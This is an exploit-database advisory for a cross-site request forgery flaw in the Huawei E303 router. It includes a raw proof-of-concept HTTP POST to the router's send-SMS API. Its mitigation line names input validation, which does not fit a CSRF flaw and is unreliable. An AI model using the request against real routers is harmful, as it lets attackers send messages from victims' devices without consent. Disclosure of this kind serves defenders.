Huawei E303 Router Cross-Site Request-Forgery Vulnerability

vendor:

E303 Router

by:

SecurityFocus

4,3

CVSS

MEDIUM

Cross-Site Request-Forgery

352

CWE

Product Name: E303 Router

Affected Version From: CH2E303SM

Affected Version To: CH2E303SM

Patch Exists: N/A

Related CWE: N/A

CPE: h:huawei:e303_router

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Huawei E303 Router Cross-Site Request-Forgery Vulnerability

Huawei E303 Router is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Proof-of-concept HTTP POST request is provided in the text.

Mitigation:

Input validation should be used to prevent attackers from exploiting this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67747/info

Huawei E303 Router is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

Huawei E303 Router running firmware versions CH2E303SM is vulnerable; other versions may also be affected. 

[Proof -of-concept HTTP POST request]:
POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225

<?xml version="1.0" 
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03 
16:00:00</Date></request>